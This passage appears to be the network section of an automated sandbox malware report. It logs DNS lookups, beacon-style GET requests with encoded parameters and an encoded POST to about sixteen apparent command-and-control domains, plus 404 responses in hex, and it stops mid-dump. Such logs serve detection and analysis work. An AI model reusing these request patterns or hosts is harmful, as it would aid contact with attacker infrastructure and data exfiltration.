                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: global trafficHTTP traffic detected: GET /s7e8/?kf-HBx=Qf5nKOHOS6pOo2hqHNTD4NLxMOybGOQpbdUHnCIedAl2mvk/ZCfVPn7bYBvLSFyKndMpVE3F/mLSkI4cHOWneAsTSYMh6rYvgLLbq+jq88smW47nOX2gz0M=&oFA=_z5x9B5 HTTP/1.1Host: www.specialgift.asiaAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                  Source: global trafficHTTP traffic detected: GET /lclg/?kf-HBx=qGNQqN428OgBR9iKpkadQRykwt+HrKy+i1J9pxVfZ8K+uwmr88+1atpMra6tnIlLOjS5I+7feEtfi/Omwv/rkGEuIwUpZoXbB9LzMpYZI6R6lH7jDDsD7jY=&oFA=_z5x9B5 HTTP/1.1Host: www.filelabel.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                  Source: global trafficHTTP traffic detected: GET /ou1g/?kf-HBx=p6P+FgoGiP/G4Ng2k4kydfL9CEjREuwmc4B14fS4wE3C00mAPriyDmdkjkAl1MwiKmR4YcU9y+Hnl6M9logr4guZJ1Pjn+I9YPEKQsPJSCqhxwn7206Dyyk=&oFA=_z5x9B5 HTTP/1.1Host: www.multileveltravel.worldAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                  Source: global trafficHTTP traffic detected: GET /xqel/?kf-HBx=vvqDHEJ83RQMdUhh5kLoqoSDKB3hWQiq1sb91PtModI/1ZQDQosT/W6HQ09vXqzqrFP7Qh9498xTBzMpQmH7Kh5kUCFMd1INst0sGCzgDgfe+hjN7G6C4+s=&oFA=_z5x9B5 HTTP/1.1Host: www.40wxd.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                  Source: global trafficHTTP traffic detected: GET /rhgo/?kf-HBx=1xwwfRv/EtrSMau8qPeCsOf3wKLyTBnoq21AcW2zPWj0G3ZAwmXkdhytTHgnTqC6RVKy1Kv2PAT+a+qucbh6tBLzZBRYsir7YQhsB0BKwkYVMNCqueBTujA=&oFA=_z5x9B5 HTTP/1.1Host: www.vasehub.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                  Source: global trafficHTTP traffic detected: GET /jp2s/?oFA=_z5x9B5&kf-HBx=P0qG7QiazDWD2BWelIei5OaE3G7F+t1+aX9fXKMK+x60PE0IVfUJFQ907pREBNW8LmwaLsR1/kIgdQ4HVuT4wdAdC4fEO7kU/4v+0UaEqAZT5BgARj9CDCY= HTTP/1.1Host: www.coffee-and-blends.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                  Source: global trafficHTTP traffic detected: GET /qmcg/?kf-HBx=67IAuCDTBw5QZph7iUnsNNZg0vqYuCAKYaPJ7pOH3jPtJouGJ8FP+NUi0Lg8hSiTUrSIuLh0DGPLGIiCUYAvzJi3IqMGAEHDzAW40nPzBt7ZJ3Wrnor3ezI=&oFA=_z5x9B5 HTTP/1.1Host: www.tmstore.clickAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                  Source: global trafficHTTP traffic detected: GET /xia9/?kf-HBx=6Fbp2c2euLl3IpV1eF5M890ZMvcTOf/3kT3/256CKoimaApAh5mhtnZkbQOyMHVCRwBLnE72oyxVmwPWVRK3JQiLPTXJhO4ROr3CrWHqyrvdf750Ozu+jso=&oFA=_z5x9B5 HTTP/1.1Host: www.softillery.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                  Source: global trafficHTTP traffic detected: GET /moqb/?oFA=_z5x9B5&kf-HBx=5S0MhnNpk6MkkLakdHV8bk6Gf6N5AAHlj1oGaRHlrviJ69CM+vN0PvYaKZeKsDU+ZViOcrN8cLcNEkQHPUUQsTizlRh8nNBpgfm81WeJmiMGBZ7xhu/fL+Q= HTTP/1.1Host: www.nad5.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                  Source: global trafficHTTP traffic detected: GET /esft/?kf-HBx=mVI2MUxphHC6Uw3f9xz7cF5W0X1TXhBjnHyqF3bL23emPksaKYEAojmfDw0HEL3vY5GLDWVdtCqn7MAr+1mql1KfONw8K+kkYDnWB0Nzinc0hknaPW1TnzQ=&oFA=_z5x9B5 HTTP/1.1Host: www.luxe.guruAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                  Source: global trafficHTTP traffic detected: GET /frw6/?kf-HBx=UG3twl1RTWICP6a+snMr6dqVChYRNbF04tf9jk2zJzREL1HFEfeM3dheGhXvZJa2xeklgJW6nyy59H+FpxNRygeU7S1OzbuuspnSBo+prL8MhwcFbuUikZc=&oFA=_z5x9B5 HTTP/1.1Host: www.digitalbloom.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                  Source: global trafficHTTP traffic detected: GET /5ab9/?kf-HBx=RKfYqv7dLSd52zuxxJ7U+qX1dgM0j08UigLPO7fV9fYs6caX5nN0t2AmzQZhkSW6ZNnx9rwHNAGWB6es6Bp2HJzLwgFpIUBewc3Sq/1ccTai3Bmxrp0U6E4=&oFA=_z5x9B5 HTTP/1.1Host: www.amitayush.digitalAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                  Source: global trafficHTTP traffic detected: GET /d5je/?oFA=_z5x9B5&kf-HBx=joFU07nwohD6eVoe3rFlartiOObsWeCn1fIADxIG1iVHGQ+b2sFWG9fhj6bDMdYTFTYIwFceucpsU6xb3PR2iChOsBNMIjf68Qc2WylAI6LhtEtoF9GlVuo= HTTP/1.1Host: www.moritynomxd.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                  Source: global trafficHTTP traffic detected: GET /h8b0/?kf-HBx=DRMewQ2K/nAxApdAjdq/8MBaTrmuK5PhjAtlDuz9ScYe9TdKczyHToKl/nXwUp75CTxdtMRmJbFDzl6M6vndpjQD4u+ERF0y3CIErlIFDiiN/rGNNtD3azo=&oFA=_z5x9B5 HTTP/1.1Host: www.tukaari.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                  Source: global trafficDNS traffic detected: DNS query: www.specialgift.asia
                  Source: global trafficDNS traffic detected: DNS query: www.filelabel.info
                  Source: global trafficDNS traffic detected: DNS query: www.longfilsalphonse.net
                  Source: global trafficDNS traffic detected: DNS query: www.multileveltravel.world
                  Source: global trafficDNS traffic detected: DNS query: www.40wxd.top
                  Source: global trafficDNS traffic detected: DNS query: www.vasehub.xyz
                  Source: global trafficDNS traffic detected: DNS query: www.coffee-and-blends.info
                  Source: global trafficDNS traffic detected: DNS query: www.tmstore.click
                  Source: global trafficDNS traffic detected: DNS query: www.softillery.info
                  Source: global trafficDNS traffic detected: DNS query: www.gemtastic.shop
                  Source: global trafficDNS traffic detected: DNS query: www.nad5.shop
                  Source: global trafficDNS traffic detected: DNS query: www.luxe.guru
                  Source: global trafficDNS traffic detected: DNS query: www.digitalbloom.info
                  Source: global trafficDNS traffic detected: DNS query: www.amitayush.digital
                  Source: global trafficDNS traffic detected: DNS query: www.moritynomxd.xyz
                  Source: global trafficDNS traffic detected: DNS query: www.tukaari.shop
                  Source: unknownHTTP traffic detected: POST /lclg/ HTTP/1.1Host: www.filelabel.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-USAccept-Encoding: gzip, deflate, brOrigin: http://www.filelabel.infoReferer: http://www.filelabel.info/lclg/Connection: closeCache-Control: max-age=0Content-Type: application/x-www-form-urlencodedContent-Length: 203User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)Data Raw: 6b 66 2d 48 42 78 3d 6e 45 6c 77 70 39 31 64 32 63 34 6b 5a 2f 72 32 30 6b 4c 6f 57 52 4c 6d 7a 37 4b 4c 6c 66 47 69 68 6c 70 57 6f 78 67 5a 57 4d 76 77 67 7a 6d 38 39 66 47 75 51 6f 51 66 72 72 69 4d 73 4a 51 45 46 6c 58 7a 45 65 43 68 46 6c 5a 48 37 63 37 35 75 4d 48 4c 38 46 30 75 44 6e 41 73 4f 75 66 4b 66 66 72 6d 57 62 77 61 4a 50 70 77 6a 45 61 55 58 52 67 74 30 6e 5a 39 73 51 59 46 58 4e 53 4f 48 41 76 56 39 35 6c 62 42 72 46 77 66 4d 50 79 74 71 77 50 4e 31 37 77 37 51 6b 49 67 49 73 56 2b 54 58 72 30 67 6e 37 43 39 55 79 4a 43 79 2b 43 67 48 35 69 62 34 47 56 49 67 30 41 55 4d 75 6f 67 3d 3d Data Ascii: kf-HBx=nElwp91d2c4kZ/r20kLoWRLmz7KLlfGihlpWoxgZWMvwgzm89fGuQoQfrriMsJQEFlXzEeChFlZH7c75uMHL8F0uDnAsOufKffrmWbwaJPpwjEaUXRgt0nZ9sQYFXNSOHAvV95lbBrFwfMPytqwPN17w7QkIgIsV+TXr0gn7C9UyJCy+CgH5ib4GVIg0AUMuog==
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Thu, 24 Oct 2024 06:01:36 GMTContent-Type: text/html; charset=utf-8Content-Length: 2088Connection: closeVary: Accept-EncodingStatus: 404 Not FoundX-Request-Id: f111254e20741f3ff67fadeaa7901cf1X-Runtime: 0.045698Data Raw: 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 20 53 74 72 69 6b 69 6e 67 6c 79 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 69 64 3d 22 76 69 65 77 70 6f 72 74 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4d 6f 6e 74 73 65 72 72 61 74 7c 4f 70 65 6e 2b 53 61 6e 73 27 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 2f 2f 61 73 73 65 74 73 2e 73 74 72 69 6b 69 6e 67 6c 79 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 34 30 34 2d 73 74 79 6c 65 73 2e 63 73 73 27 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 20 20 20 20 3c 21 2d 2d 5b 69 66 20 6c 74 65 20 49 45 20 37 5d 3e 0a 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2e 77 69 64 65 20 7b 20 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 31 36 30 70 78 3b 20 7d 0a 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 20 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 2f 2f 20 47 6f 6f 67 6c 65 20 41 6e 61 6c 79 74 69 63 73 0a 20 20 20 20 28 66 75 6e 63 74 69 6f 6e 28 69 2c 73 2c 6f 2c 67 2c 72 2c 61 2c 6d 29 7b 69 5b 27 47 6f 6f 67 6c 65 41 6e 61 6c 79 74 69 63 73 4f 62 6a 65 63 74 27 5d 3d 72 3b 69 5b 72 5d 3d 69 5b 72 5d 7c 7c 66 75 6e 63 74 69 6f 6e 28 29 7b 0a 20 20 20 20 20 20 28 69 5b 72 5d 2e 71 3d 69 5b 72 5d 2e 71 7c 7c 5b 5d 29 2e 70 75 73 68 28 61 72 67 75 6d 65 6e 74 73 29 7d 2c 69 5b 72 5d 2e 6c 3d 31 2a 6e 65 77 20 44 61 74 65 28 29 3b 61 3d 73 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 6f 29 2c 0a 20 20 20 20 20 20 6d 3d 73 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 6f 29 5b 30 5d 3b 61 2e 61 73 79 6e 63 3d 31 3b 61 2e 73 72 63 3d 67 3b 6d 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 61 2c 6d 29 0a 20 20 20 20 20 20 7d 29 28 77 69 6e 64 6f 77 2c 64 6f 63 75 6d 65 6e 74 2c 27 73 63 72 69 70 74 27 2c 27 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2d 61 6e 61 6c 79 74 69 63 73 2e 63 6f 6d 2f 61 6e 61 6c 79 74 69 63 73 2e 6a 73 27 2c 27 67 61 27 29 3b 0a 0a 20 20 20 20 20 20 67 61 28 27 63 72 65 61 74 65 27 2c 20 27
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 24 Oct 2024 06:02:28 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 24 Oct 2024 06:02:30 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 24 Oct 2024 06:02:33 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 24 Oct 2024 06:02:35 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 